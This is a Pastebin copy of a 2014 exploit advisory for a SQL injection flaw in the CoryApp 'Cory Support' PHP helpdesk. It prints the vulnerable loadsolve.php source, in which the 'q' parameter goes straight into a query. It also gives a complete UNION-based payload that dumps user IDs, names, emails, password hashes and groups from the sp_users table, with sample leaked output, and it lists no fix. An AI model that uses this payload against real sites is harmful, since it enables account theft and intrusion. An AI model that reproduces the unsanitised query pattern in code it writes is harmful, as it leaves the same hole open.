API tools faq
paste
Advertisement
Mayk0

#; CoryApp Cory Support SQL Injection Vulnerability

Mayk0
Mar 2nd, 2014
172
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.59 KB | None | 0 0
raw download clone embed print report
  1. Full title CoryApp Cory Support SQL Injection Vulnerability
  2. Date add 2014-03-02
  3. Category web applications
  4. Platform php
  5. Risk <font color="#FFBF00">Security Risk High</font>
  6. Description CoryApp Cory Support suffers from a remote SQL injection vulnerability.
  7.  
  8. =========================================
  9.  
  10. # Exploit Title: CoryApp (Cory Support) MySQL Injection Vulnerabilities
  11. # Google Dork: None
  12. # Date: 02,March 02,2014
  13. # Exploit Author: Slotleet
  14. # Vendor Homepage: http://coryapp.com
  15. # Software Link:
  16. http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934 (u
  17. have to register)
  18. # Version: None
  19. # Tested on: Win,Linux
  20. # Greet'z : I-HMX <3
  21. ==========================
  22. Vulnerability Description
  23. ==========================
  24.  
  25. The Cory Support is prone to Get MySQL Injection Vulnerabilities
  26.  
  27. ==========================
  28. PoC-Exploit
  29. ==========================
  30.  
  31. // GET MySQL Injection with "q" Parameter in /loadsolve.php
  32.  
  33. 1 : <?php
  34. 2 : require_once('includes/config.php');
  35. 3 : require_once('includes/database.php');
  36. 4 : $sql = "select Solutions, ProblemID from
  37. ".$table_prefix."problemsolutions where ProblemID = '".$_GET['q']."'
  38. limit 3";
  39. 5 : $qry = mysql_query($sql);
  40. 6 : if(mysql_num_rows($qry)>0){
  41. 7 : while($rows = mysql_fetch_array($qry)){
  42. 8 : echo '<img src="'.$base_url.'imgs/re.gif"
  43. style="margin-left:3%"/>'.stripslashes($rows['Solutions']).'<br>';
  44. 9 : }
  45. 10 : echo '<p style="margin:0px; padding:0px; margin-left:3%">. .
  46. .</p><a href="'.$base_url.'view.php?id='.$_GET['q'].'"><small><i>View
  47. more</i></small></a>';
  48. 11 : }
  49. 12 : else echo '<i>Not have answer !</i>';
  50. 13 : mysql_close();
  51. 14 : ?>
  52.  
  53. In line 3 coder failed to secure the "q" Parameter Against (MySQL
  54. Injection) using q parameter
  55.  
  56. (1) Under "q" set your GET Parameter q to "999999.9' union all select
  57. (select concat(0x27%2C0x7e%2Cunhex(Hex(cast(sp_users.UserID as
  58. char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Name as
  59. char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Email as
  60. char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Password as
  61. char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.UserGroup as
  62. char)))%2C0x27%2C0x7e) from `DATABASE NAME HERE`.sp_users limit 5%2C1)
  63. %2C0x31303235343830303536 and 'x'%3D'x" (without quotation marks)
  64.  
  65.  
  66.  
  67. The "q" GET MySQL injection will be executed for the MySQL Server From
  68. browser (You'll see the info like
  69. '~6^admin^slotleet@gmail.com^e10adc3949ba59abbe56e057f20f883e^3'~)
  70.  
  71. ==========================
  72. Solution
  73. ==========================
  74.  
  75. Not Available.
  76.  
  77. ==========================
  78. Credits
  79. ==========================
  80.  
  81. Vulnerabilities found and advisory written by Slotleet.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!